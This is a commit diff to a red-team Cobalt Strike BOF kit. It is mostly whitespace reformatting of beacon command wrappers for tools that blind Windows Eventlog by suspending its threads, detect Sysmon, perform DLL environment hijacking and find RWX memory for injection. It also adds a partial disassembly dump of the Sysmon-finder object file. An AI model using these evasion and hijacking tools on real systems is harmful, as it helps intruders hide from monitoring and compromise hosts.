small fix

KIT/BlindEventlog/blindeventlog.cna

@@ -1,31 +1,31 @@
 # author REDMED-X
 
 beacon_command_register(
-	"blindeventlog", "Blind Eventlog by suspending its threads.\n",
-	"INFO:\nBlind Eventlog by suspending its threads. This technique requires elevated privileges.\nBe aware that all events, from the period the threads were suspended, will be pushed to Eventlog the moment the threads are resumed.\n\nOPTIONS:\n[suspend]: find and suspend all Eventlog threads and disrupt its functionality\n[resume]: find and resume all Eventlog threads and restore its functionality\n\n" .
-	"USAGE:\nblindeventlog <suspend | resume>\n\n");
+    "blindeventlog", "Blind Eventlog by suspending its threads.\n",
+    "INFO:\nBlind Eventlog by suspending its threads. This technique requires elevated privileges.\nBe aware that all events, from the period the threads were suspended, will be pushed to Eventlog the moment the threads are resumed.\n\nOPTIONS:\n[suspend]: find and suspend all Eventlog threads and disrupt its functionality\n[resume]: find and resume all Eventlog threads and restore its functionality\n\n" .
+    "USAGE:\nblindeventlog <suspend | resume>\n\n");
 
 
 alias blindeventlog {
     $bid = $1;
     $action = $2;
 
-	if ($action eq "suspend" || $action eq "resume") {
-	}
-	else {
-		berror($bid, "Please specify one of the following actions: suspend | resume\n");
-		return;
-	}
+    if ($action eq "suspend" || $action eq "resume") {
+    }
+    else {
+        berror($bid, "Please specify one of the following actions: suspend | resume\n");
+        return;
+    }
 	
     # Read in the right BOF file
     $handle = openf(script_resource("blindeventlog.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
+    # Pack our arguments
     $arg_data  = bof_pack($bid, "z", $action);
 
-	blog($bid, "Tasked to interact with Eventlog..");
+    blog($bid, "Tasked to interact with Eventlog..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

KIT/DllEnvHijacking/dllenvhijacking.cna

@@ -9,26 +9,25 @@ beacon_command_register(
 alias dllenvhijacking {
     $bid = $1;
     $sysroot = $2;
-	$proxydll = $3;
-	$pathtodll = $4;
-	$vulnbinary = $5;
-	$pid = $6;
-
-	if ($sysroot eq "" || $proxydll eq "" || $pathtodll eq "" || $vulnbinary eq "" || $pid eq "") {
-		berror($bid, "Please make sure that all the arguments are filled in and correct!\n");
-		return;
-	}
-	
+    $proxydll = $3;
+    $pathtodll = $4;
+    $vulnbinary = $5;
+    $pid = $6;
+
+    if ($sysroot eq "" || $proxydll eq "" || $pathtodll eq "" || $vulnbinary eq "" || $pid eq "") {
+        berror($bid, "Please make sure that all the arguments are filled in and correct!\n");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("dllenvhijacking.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
+    # Pack our arguments
     $arg_data  = bof_pack($bid, "ZZZzi", $sysroot, $proxydll, $pathtodll, $vulnbinary, $pid);
-	
 
-	blog($bid, "Tasked execute DLL Environment hijacking..");
+    blog($bid, "Tasked execute DLL Environment hijacking..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

KIT/FindDotnet/finddotnet.cna

@@ -1,9 +1,9 @@
 # author REDMED-X
 
 beacon_command_register(
-	"finddotnet", "Find processes that most likely have .NET loaded.",
-	"INFO:\nFind processes that most likely have .NET loaded by searching for the section name: \BaseNamedObjects\Cor_Private_IPCBlock(_v4)_<ProcessId>\n\n" .
-	"USAGE:\nfinddotnet\n\n");
+    "finddotnet", "Find processes that most likely have .NET loaded.",
+    "INFO:\nFind processes that most likely have .NET loaded by searching for the section name: \BaseNamedObjects\Cor_Private_IPCBlock(_v4)_<ProcessId>\n\n" .
+    "USAGE:\nfinddotnet\n\n");
 
 
 alias finddotnet {
@@ -13,9 +13,9 @@ alias finddotnet {
     $handle = openf(script_resource("finddotnet.o"));
     $data   = readb($handle, -1);
     closef($handle);
-    
-	blog($bid, "Tasked to search for processes that have .NET loaded..");
-	
+
+    blog($bid, "Tasked to search for processes that have .NET loaded..");
+
     beacon_inline_execute($bid, $data, "go", $null);
 }
 

KIT/FindHandle/findhandle.cna

@@ -1,62 +1,61 @@
 # author REDMED-X
 
 beacon_command_register(
-	"findhandle", "Find process and thread handle types between processes.",
-	"INFO:\nFind process and thread handle types between processes.\n\nOPTIONS:\n[all]: list all processes with handles to all other processes\n[h2p]: list all processes that have a handle to a specific process\n[p2h]: list handles from a specific process to all other processes\n\nHandle Query Options:\n[proc]: search for PROCESS type handles\n[thread]: search for THREAD type handles\n\nTargeted Search Options:\n[<pid>]: for both the [h2p] and [p2h] search options, specify the PID of the process your interested in.\n\n" .
-	"USAGE:\nfindhandle all <proc | thread>\nfindhandle h2p <proc | thread> <pid>\nfindhandle p2h <proc | thread> <pid>\n\n");
+    "findhandle", "Find process and thread handle types between processes.",
+    "INFO:\nFind process and thread handle types between processes.\n\nOPTIONS:\n[all]: list all processes with handles to all other processes\n[h2p]: list all processes that have a handle to a specific process\n[p2h]: list handles from a specific process to all other processes\n\nHandle Query Options:\n[proc]: search for PROCESS type handles\n[thread]: search for THREAD type handles\n\nTargeted Search Options:\n[<pid>]: for both the [h2p] and [p2h] search options, specify the PID of the process your interested in.\n\n" .
+    "USAGE:\nfindhandle all <proc | thread>\nfindhandle h2p <proc | thread> <pid>\nfindhandle p2h <proc | thread> <pid>\n\n");
 
 
 alias findhandle {
     $bid = $1;
     $search = $2;
     $query = $3;
-	$pid = $4;
-	
-	if ($search eq "") {
-		berror($bid, "Please specify one of the following seach options: all | h2p | p2h\n");
-		return;
-	}
-	
-	if ($search eq "all" || $search eq "h2p" || $search eq "p2h") {
-		if ($query eq "") {
-			berror($bid, "Please specify one of the following handle types to search for: proc | thread\n");
-			return;
-		}
-		if ($query eq "proc" || $query eq "thread") {
-		
-			if ($search eq "h2p" && $pid eq "" ) {
-				berror($bid, "Please specify the pid to target a specific process.\n");
-				return;
-			}
-			if ($search eq "p2h" && $pid eq "" ) {
-				berror($bid, "Please specify the pid to target a specific process.\n");
-				return;
-			}
-		}
-		else {
-			berror($bid, "This handle type isn't supported. Please specify one of the following handle types to search for: proc | thread\n");
-			return;
-		}
-	}
-	else {
-		berror($bid, "This option isn't supported. Please specify one of the following seach options: all | h2p | p2h\n");
-		return;
-	}
+    $pid = $4;
+
+    if ($search eq "") {
+        berror($bid, "Please specify one of the following seach options: all | h2p | p2h\n");
+        return;
+    }
+
+    if ($search eq "all" || $search eq "h2p" || $search eq "p2h") {
+        if ($query eq "") {
+            berror($bid, "Please specify one of the following handle types to search for: proc | thread\n");
+            return;
+        }
+        if ($query eq "proc" || $query eq "thread") {
+            if ($search eq "h2p" && $pid eq "" ) {
+                berror($bid, "Please specify the pid to target a specific process.\n");
+                return;
+            }
+            if ($search eq "p2h" && $pid eq "" ) {
+                berror($bid, "Please specify the pid to target a specific process.\n");
+                return;
+            }
+        }
+        else {
+            berror($bid, "This handle type isn't supported. Please specify one of the following handle types to search for: proc | thread\n");
+            return;
+        }
+    }
+    else {
+        berror($bid, "This option isn't supported. Please specify one of the following seach options: all | h2p | p2h\n");
+        return;
+    }
 	
     # Read in the right BOF file
     $handle = openf(script_resource("findhandle.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
-	if ($pid eq "") {
-       $arg_data  = bof_pack($bid, "zz", $search, $query);
+    # Pack our arguments
+    if ($pid eq "") {
+        $arg_data  = bof_pack($bid, "zz", $search, $query);
     }
-	else {
-		$arg_data  = bof_pack($bid, "zzi", $search, $query, $pid);
-	}
-	
-	blog($bid, "Tasked to enumerate handles..");
+    else {
+        $arg_data  = bof_pack($bid, "zzi", $search, $query, $pid);
+    }
+
+    blog($bid, "Tasked to enumerate handles..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

KIT/FindLib/findlib.cna

@@ -1,9 +1,9 @@
 # author REDMED-X
 
 beacon_command_register(
-	"findlib", "Find loaded module(s) in remote process(es)",
-	"INFO:\nFind a specific loaded module in all processes OR list all loaded modules in a specific process.\n\nOPTIONS:\n[search]: find all processes that have loaded a specific module (e.g. winhttp.dll or ws2_32.dll).\n[list]: list all loaded modules in a remote process.\n\n" .
-	"USAGE:\nfindlib search <module name>\nfindlib list <pid>\n\n");
+    "findlib", "Find loaded module(s) in remote process(es)",
+    "INFO:\nFind a specific loaded module in all processes OR list all loaded modules in a specific process.\n\nOPTIONS:\n[search]: find all processes that have loaded a specific module (e.g. winhttp.dll or ws2_32.dll).\n[list]: list all loaded modules in a remote process.\n\n" .
+    "USAGE:\nfindlib search <module name>\nfindlib list <pid>\n\n");
 	
 
 
@@ -12,45 +12,41 @@ alias findlib {
     $option = $2;
     $target = $3;
 
-	if ($option eq "") {
-		berror($bid, "Please specify one of the following enumeration options: search | list\n");
-		return;
-	}
-	
-	if ($option eq "search" || $option eq "list") {
-	
-		if ($option eq "search" && $target eq "") {
-			berror($bid, "Please specify a module name to search for\n");
-			return;
-		}
-		
-		if ($option eq "list" && $target eq "") {
-			berror($bid, "Please specify the pid of the target process to enumerate\n");
-			return;
-		}
-	}
-	else {
-		berror($bid, "This enumeration option isn't supported. Please specify one of the following enumeration options: search | list\n");
-		return;
-	}
-	
+    if ($option eq "") {
+        berror($bid, "Please specify one of the following enumeration options: search | list\n");
+        return;
+    }
+
+    if ($option eq "search" || $option eq "list") {
+        if ($option eq "search" && $target eq "") {
+            berror($bid, "Please specify a module name to search for\n");
+            return;
+        }
+
+        if ($option eq "list" && $target eq "") {
+            berror($bid, "Please specify the pid of the target process to enumerate\n");
+            return;
+        }
+    }
+    else {
+        berror($bid, "This enumeration option isn't supported. Please specify one of the following enumeration options: search | list\n");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("findlib.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
-	if ($option eq "search") {
+    # Pack our arguments
+    if ($option eq "search") {
        $arg_data  = bof_pack($bid, "zz", $option, $target);
     }
-	else {
-		$arg_data  = bof_pack($bid, "zi", $option, $target);
-	}
-	
-	#btask($1, "arg 1: $+  $option");
-	#btask($1, "arg 2: $+  $target");
-	
-	blog($bid, "Tasked to enumerate loaded modules..");
+    else {
+        $arg_data  = bof_pack($bid, "zi", $option, $target);
+    }
+
+    blog($bid, "Tasked to enumerate loaded modules..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

KIT/FindRWX/findrwx.cna

@@ -1,19 +1,19 @@
 # author REDMED-X
 
 beacon_command_register(
-	"findrwx", "Find RWX memory regions in a target process.",
-	"INFO:\nFind processes that already have memory allocated for read/write/execute (like most .NET processes)\n\nOPTIONS:\n[pid]: target process to enumerate\n\n" .
-	"USAGE:\nfindrwx <pid>\n\n");
+    "findrwx", "Find RWX memory regions in a target process.",
+    "INFO:\nFind processes that already have memory allocated for read/write/execute (like most .NET processes)\n\nOPTIONS:\n[pid]: target process to enumerate\n\n" .
+    "USAGE:\nfindrwx <pid>\n\n");
 
 alias findrwx {
     $bid = $1;
-	$pid = $2;
+    $pid = $2;
+
+    if ($pid eq "") {
+        berror($bid, "Please make sure that the PID of the target process is specified.");
+        return;
+    }
 
-	if ($pid eq "") {
-		berror($bid, "Please make sure that the PID of the target process is specified.");
-		return;
-	}
-	
     # Read in the right BOF file
     $handle = openf(script_resource("findrwx.o"));
     $data   = readb($handle, -1);
@@ -21,9 +21,9 @@ alias findrwx {
 
     # Pack our arguments
     $arg_data  = bof_pack($bid, "i", $pid);
-    
-	blog($bid, "Tasked to verify if the target process has RWX memory regions..");
-	
+
+    blog($bid, "Tasked to verify if the target process has RWX memory regions..");
+
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

KIT/FindSysmon/findsysmon.c

@@ -323,7 +323,7 @@ int go(char *args, int len) {
 	if (MSVCRT$strcmp(action, "reg") == 0) {
 		res = FindSysmon();
 		if(!res) {
-			BeaconPrintf(CALLBACK_ERROR, "[+] No Sysmon service found :)\n");
+			BeaconPrintf(CALLBACK_OUTPUT, "[+] No Sysmon service found :)\n");
 			return 0;
 		}
 		else  {
@@ -351,5 +351,3 @@ int go(char *args, int len) {
 }
 
 
-
-

KIT/FindSysmon/findsysmon.cna

@@ -1,31 +1,31 @@
 # author REDMED-X
 
 beacon_command_register(
-	"findsysmon", "Verify if Sysmon is running.\n",
-	"INFO:\nVerify if Sysmon is running. This can be done by checking the registry or by enumerating Minifilter drivers and search for one that is associated with Sysmon.\n\nOPTIONS:\n[reg]: search the registry to check if Sysmon is present on the system and return the Sysmon service PID if active.\n[driver]: list all the Minifilter drivers on the system to check manually (requires elevated privileges).\n\n" .
-	"USAGE:\nfindsysmon <reg | driver>\n\n");
+    "findsysmon", "Verify if Sysmon is running.\n",
+    "INFO:\nVerify if Sysmon is running. This can be done by checking the registry or by enumerating Minifilter drivers and search for one that is associated with Sysmon.\n\nOPTIONS:\n[reg]: search the registry to check if Sysmon is present on the system and return the Sysmon service PID if active.\n[driver]: list all the Minifilter drivers on the system to check manually (requires elevated privileges).\n\n" .
+    "USAGE:\nfindsysmon <reg | driver>\n\n");
 
 
 alias findsysmon {
     $bid = $1;
     $action = $2;
 
-	if ($action eq "reg" || $action eq "driver") {
-	}
-	else {
-		berror($bid, "Please specify one of the following enumeration options: reg | driver\n");
-		return;
-	}
-	
+    if ($action eq "reg" || $action eq "driver") {
+    }
+    else {
+        berror($bid, "Please specify one of the following enumeration options: reg | driver\n");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("findsysmon.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
+    # Pack our arguments
     $arg_data  = bof_pack($bid, "z", $action);
 
-	blog($bid, "Tasked to find Sysmon..");
+    blog($bid, "Tasked to find Sysmon..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

KIT/FindSysmon/findsysmon.disasm

@@ -0,0 +1,930 @@
+Microsoft (R) COFF/PE Dumper Version 14.29.30148.0
+Copyright (C) Microsoft Corporation.  All rights reserved.
+
+
+Dump of file findsysmon.o
+
+File Type: COFF OBJECT
+
+BeaconPrintToStreamW:
+  0000000000000000: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  0000000000000005: 48 89 54 24 10     mov         qword ptr [rsp+10h],rdx
+  000000000000000A: 4C 89 44 24 18     mov         qword ptr [rsp+18h],r8
+  000000000000000F: 4C 89 4C 24 20     mov         qword ptr [rsp+20h],r9
+  0000000000000014: 48 83 EC 58        sub         rsp,58h
+  0000000000000018: C7 44 24 30 01 00  mov         dword ptr [rsp+30h],1
+                    00 00
+  0000000000000020: C7 44 24 34 00 00  mov         dword ptr [rsp+34h],0
+                    00 00
+  0000000000000028: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],1
+                    00 01
+  0000000000000030: 77 28              ja          000000000000005A
+  0000000000000032: 4C 8D 05 00 00 00  lea         r8,[g_lpStream]
+                    00
+  0000000000000039: BA 01 00 00 00     mov         edx,1
+  000000000000003E: 33 C9              xor         ecx,ecx
+  0000000000000040: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$CreateStreamOnHGlobal]
+  0000000000000046: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000004A: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  000000000000004F: 7D 09              jge         000000000000005A
+  0000000000000051: 8B 44 24 30        mov         eax,dword ptr [rsp+30h]
+  0000000000000055: E9 01 01 00 00     jmp         000000000000015B
+  000000000000005A: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],1
+                    00 01
+  0000000000000062: 77 2E              ja          0000000000000092
+  0000000000000064: BA 02 00 00 00     mov         edx,2
+  0000000000000069: B9 00 20 00 00     mov         ecx,2000h
+  000000000000006E: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$calloc]
+  0000000000000074: 48 89 05 00 00 00  mov         qword ptr [g_lpwPrintBuffer],rax
+                    00
+  000000000000007B: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  0000000000000083: 75 0D              jne         0000000000000092
+  0000000000000085: C7 44 24 30 05 40  mov         dword ptr [rsp+30h],80004005h
+                    00 80
+  000000000000008D: E9 9D 00 00 00     jmp         000000000000012F
+  0000000000000092: 48 8D 44 24 68     lea         rax,[rsp+68h]
+  0000000000000097: 48 89 44 24 38     mov         qword ptr [rsp+38h],rax
+  000000000000009C: 48 8B 44 24 38     mov         rax,qword ptr [rsp+38h]
+  00000000000000A1: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  00000000000000A6: 4C 8B 4C 24 60     mov         r9,qword ptr [rsp+60h]
+  00000000000000AB: 41 B8 FF 1F 00 00  mov         r8d,1FFFh
+  00000000000000B1: BA 00 20 00 00     mov         edx,2000h
+  00000000000000B6: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000000BD: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$_vsnwprintf_s]
+  00000000000000C3: 85 C0              test        eax,eax
+  00000000000000C5: 75 0A              jne         00000000000000D1
+  00000000000000C7: C7 44 24 30 05 40  mov         dword ptr [rsp+30h],80004005h
+                    00 80
+  00000000000000CF: EB 5E              jmp         000000000000012F
+  00000000000000D1: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],0
+                    00 00
+  00000000000000D9: 74 4C              je          0000000000000127
+  00000000000000DB: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000000E2: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$wcslen]
+  00000000000000E8: 8B C0              mov         eax,eax
+  00000000000000EA: 48 D1 E0           shl         rax,1
+  00000000000000ED: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  00000000000000F4: 48 8B 09           mov         rcx,qword ptr [rcx]
+  00000000000000F7: 48 89 4C 24 40     mov         qword ptr [rsp+40h],rcx
+  00000000000000FC: 4C 8D 4C 24 34     lea         r9,[rsp+34h]
+  0000000000000101: 44 8B C0           mov         r8d,eax
+  0000000000000104: 48 8B 15 00 00 00  mov         rdx,qword ptr [g_lpwPrintBuffer]
+                    00
+  000000000000010B: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000112: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  0000000000000117: FF 50 20           call        qword ptr [rax+20h]
+  000000000000011A: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000011E: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000123: 7D 02              jge         0000000000000127
+  0000000000000125: EB 08              jmp         000000000000012F
+  0000000000000127: C7 44 24 30 00 00  mov         dword ptr [rsp+30h],0
+                    00 00
+  000000000000012F: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  0000000000000137: 74 15              je          000000000000014E
+  0000000000000139: 41 B8 00 40 00 00  mov         r8d,4000h
+  000000000000013F: 33 D2              xor         edx,edx
+  0000000000000141: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  0000000000000148: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memset]
+  000000000000014E: 48 C7 44 24 38 00  mov         qword ptr [rsp+38h],0
+                    00 00 00
+  0000000000000157: 8B 44 24 30        mov         eax,dword ptr [rsp+30h]
+  000000000000015B: 48 83 C4 58        add         rsp,58h
+  000000000000015F: C3                 ret
+  0000000000000160: CC                 int         3
+  0000000000000161: CC                 int         3
+  0000000000000162: CC                 int         3
+  0000000000000163: CC                 int         3
+  0000000000000164: CC                 int         3
+  0000000000000165: CC                 int         3
+  0000000000000166: CC                 int         3
+  0000000000000167: CC                 int         3
+  0000000000000168: CC                 int         3
+  0000000000000169: CC                 int         3
+  000000000000016A: CC                 int         3
+  000000000000016B: CC                 int         3
+  000000000000016C: CC                 int         3
+  000000000000016D: CC                 int         3
+  000000000000016E: CC                 int         3
+  000000000000016F: CC                 int         3
+BeaconOutputStreamW:
+  0000000000000170: 40 57              push        rdi
+  0000000000000172: 48 81 EC A0 00 00  sub         rsp,0A0h
+                    00
+  0000000000000179: 48 8D 44 24 50     lea         rax,[rsp+50h]
+  000000000000017E: 48 8B F8           mov         rdi,rax
+  0000000000000181: 33 C0              xor         eax,eax
+  0000000000000183: B9 50 00 00 00     mov         ecx,50h
+  0000000000000188: F3 AA              rep stos    byte ptr [rdi]
+  000000000000018A: 48 C7 44 24 30 00  mov         qword ptr [rsp+30h],0
+                    00 00 00
+  0000000000000193: C7 44 24 28 00 00  mov         dword ptr [rsp+28h],0
+                    00 00
+  000000000000019B: 48 C7 44 24 20 00  mov         qword ptr [rsp+20h],0
+                    00 00 00
+  00000000000001A4: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  00000000000001AB: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000001AE: 41 B8 01 00 00 00  mov         r8d,1
+  00000000000001B4: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  00000000000001B9: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  00000000000001C0: FF 50 60           call        qword ptr [rax+60h]
+  00000000000001C3: 85 C0              test        eax,eax
+  00000000000001C5: 7D 05              jge         00000000000001CC
+  00000000000001C7: E9 13 01 00 00     jmp         00000000000002DF
+  00000000000001CC: 8B 44 24 60        mov         eax,dword ptr [rsp+60h]
+  00000000000001D0: 48 89 44 24 30     mov         qword ptr [rsp+30h],rax
+  00000000000001D5: 48 8B 44 24 30     mov         rax,qword ptr [rsp+30h]
+  00000000000001DA: 48 FF C0           inc         rax
+  00000000000001DD: 48 89 44 24 38     mov         qword ptr [rsp+38h],rax
+  00000000000001E2: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  00000000000001E8: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  00000000000001ED: 4C 8B C1           mov         r8,rcx
+  00000000000001F0: BA 08 00 00 00     mov         edx,8
+  00000000000001F5: 48 8B C8           mov         rcx,rax
+  00000000000001F8: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapAlloc]
+  00000000000001FE: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000203: 48 83 7C 24 20 00  cmp         qword ptr [rsp+20h],0
+  0000000000000209: 74 6B              je          0000000000000276
+  000000000000020B: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  0000000000000214: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  000000000000021B: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000021E: 45 33 C9           xor         r9d,r9d
+  0000000000000221: 45 33 C0           xor         r8d,r8d
+  0000000000000224: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  0000000000000229: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000230: FF 50 28           call        qword ptr [rax+28h]
+  0000000000000233: 85 C0              test        eax,eax
+  0000000000000235: 7D 02              jge         0000000000000239
+  0000000000000237: EB 3D              jmp         0000000000000276
+  0000000000000239: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  0000000000000240: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000243: 4C 8D 4C 24 28     lea         r9,[rsp+28h]
+  0000000000000248: 44 8B 44 24 30     mov         r8d,dword ptr [rsp+30h]
+  000000000000024D: 48 8B 54 24 20     mov         rdx,qword ptr [rsp+20h]
+  0000000000000252: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000259: FF 50 18           call        qword ptr [rax+18h]
+  000000000000025C: 85 C0              test        eax,eax
+  000000000000025E: 7D 02              jge         0000000000000262
+  0000000000000260: EB 14              jmp         0000000000000276
+  0000000000000262: 4C 8B 44 24 20     mov         r8,qword ptr [rsp+20h]
+  0000000000000267: 48 8D 15 00 00 00  lea         rdx,[$SG105135]
+                    00
+  000000000000026E: 33 C9              xor         ecx,ecx
+  0000000000000270: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000276: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],0
+                    00 00
+  000000000000027E: 74 1F              je          000000000000029F
+  0000000000000280: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  0000000000000287: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000028A: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000291: FF 50 10           call        qword ptr [rax+10h]
+  0000000000000294: 48 C7 05 00 00 00  mov         qword ptr [g_lpStream],0
+                    00 00 00 00 00
+  000000000000029F: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  00000000000002A7: 74 18              je          00000000000002C1
+  00000000000002A9: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000002B0: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  00000000000002B6: 48 C7 05 00 00 00  mov         qword ptr [g_lpwPrintBuffer],0
+                    00 00 00 00 00
+  00000000000002C1: 48 83 7C 24 20 00  cmp         qword ptr [rsp+20h],0
+  00000000000002C7: 74 16              je          00000000000002DF
+  00000000000002C9: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  00000000000002CF: 4C 8B 44 24 20     mov         r8,qword ptr [rsp+20h]
+  00000000000002D4: 33 D2              xor         edx,edx
+  00000000000002D6: 48 8B C8           mov         rcx,rax
+  00000000000002D9: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapFree]
+  00000000000002DF: 48 81 C4 A0 00 00  add         rsp,0A0h
+                    00
+  00000000000002E6: 5F                 pop         rdi
+  00000000000002E7: C3                 ret
+  00000000000002E8: CC                 int         3
+  00000000000002E9: CC                 int         3
+  00000000000002EA: CC                 int         3
+  00000000000002EB: CC                 int         3
+  00000000000002EC: CC                 int         3
+  00000000000002ED: CC                 int         3
+  00000000000002EE: CC                 int         3
+  00000000000002EF: CC                 int         3
+PrintSysmonPID:
+  00000000000002F0: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  00000000000002F5: 48 81 EC E8 00 00  sub         rsp,0E8h
+                    00
+  00000000000002FC: C7 44 24 30 00 00  mov         dword ptr [rsp+30h],0
+                    00 00
+  0000000000000304: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  000000000000030D: C7 44 24 70 13 75  mov         dword ptr [rsp+70h],3837513h
+                    83 03
+  0000000000000315: B8 8B 09 00 00     mov         eax,98Bh
+  000000000000031A: 66 89 44 24 74     mov         word ptr [rsp+74h],ax
+  000000000000031F: B8 D8 11 00 00     mov         eax,11D8h
+  0000000000000324: 66 89 44 24 76     mov         word ptr [rsp+76h],ax
+  0000000000000329: C6 44 24 78 94     mov         byte ptr [rsp+78h],94h
+  000000000000032E: C6 44 24 79 14     mov         byte ptr [rsp+79h],14h
+  0000000000000333: C6 44 24 7A 50     mov         byte ptr [rsp+7Ah],50h
+  0000000000000338: C6 44 24 7B 50     mov         byte ptr [rsp+7Bh],50h
+  000000000000033D: C6 44 24 7C 54     mov         byte ptr [rsp+7Ch],54h
+  0000000000000342: C6 44 24 7D 50     mov         byte ptr [rsp+7Dh],50h
+  0000000000000347: C6 44 24 7E 30     mov         byte ptr [rsp+7Eh],30h
+  000000000000034C: C6 44 24 7F 30     mov         byte ptr [rsp+7Fh],30h
+  0000000000000351: C7 44 24 60 12 75  mov         dword ptr [rsp+60h],3837512h
+                    83 03
+  0000000000000359: B8 8B 09 00 00     mov         eax,98Bh
+  000000000000035E: 66 89 44 24 64     mov         word ptr [rsp+64h],ax
+  0000000000000363: B8 D8 11 00 00     mov         eax,11D8h
+  0000000000000368: 66 89 44 24 66     mov         word ptr [rsp+66h],ax
+  000000000000036D: C6 44 24 68 94     mov         byte ptr [rsp+68h],94h
+  0000000000000372: C6 44 24 69 14     mov         byte ptr [rsp+69h],14h
+  0000000000000377: C6 44 24 6A 50     mov         byte ptr [rsp+6Ah],50h
+  000000000000037C: C6 44 24 6B 50     mov         byte ptr [rsp+6Bh],50h
+  0000000000000381: C6 44 24 6C 54     mov         byte ptr [rsp+6Ch],54h
+  0000000000000386: C6 44 24 6D 50     mov         byte ptr [rsp+6Dh],50h
+  000000000000038B: C6 44 24 6E 30     mov         byte ptr [rsp+6Eh],30h
+  0000000000000390: C6 44 24 6F 30     mov         byte ptr [rsp+6Fh],30h
+  0000000000000395: C7 84 24 80 00 00  mov         dword ptr [rsp+80h],20404h
+                    00 04 04 02 00
+  00000000000003A0: 33 C0              xor         eax,eax
+  00000000000003A2: 66 89 84 24 84 00  mov         word ptr [rsp+84h],ax
+                    00 00
+  00000000000003AA: 33 C0              xor         eax,eax
+  00000000000003AC: 66 89 84 24 86 00  mov         word ptr [rsp+86h],ax
+                    00 00
+  00000000000003B4: C6 84 24 88 00 00  mov         byte ptr [rsp+88h],0C0h
+                    00 C0
+  00000000000003BC: C6 84 24 89 00 00  mov         byte ptr [rsp+89h],0
+                    00 00
+  00000000000003C4: C6 84 24 8A 00 00  mov         byte ptr [rsp+8Ah],0
+                    00 00
+  00000000000003CC: C6 84 24 8B 00 00  mov         byte ptr [rsp+8Bh],0
+                    00 00
+  00000000000003D4: C6 84 24 8C 00 00  mov         byte ptr [rsp+8Ch],0
+                    00 00
+  00000000000003DC: C6 84 24 8D 00 00  mov         byte ptr [rsp+8Dh],0
+                    00 00
+  00000000000003E4: C6 84 24 8E 00 00  mov         byte ptr [rsp+8Eh],0
+                    00 00
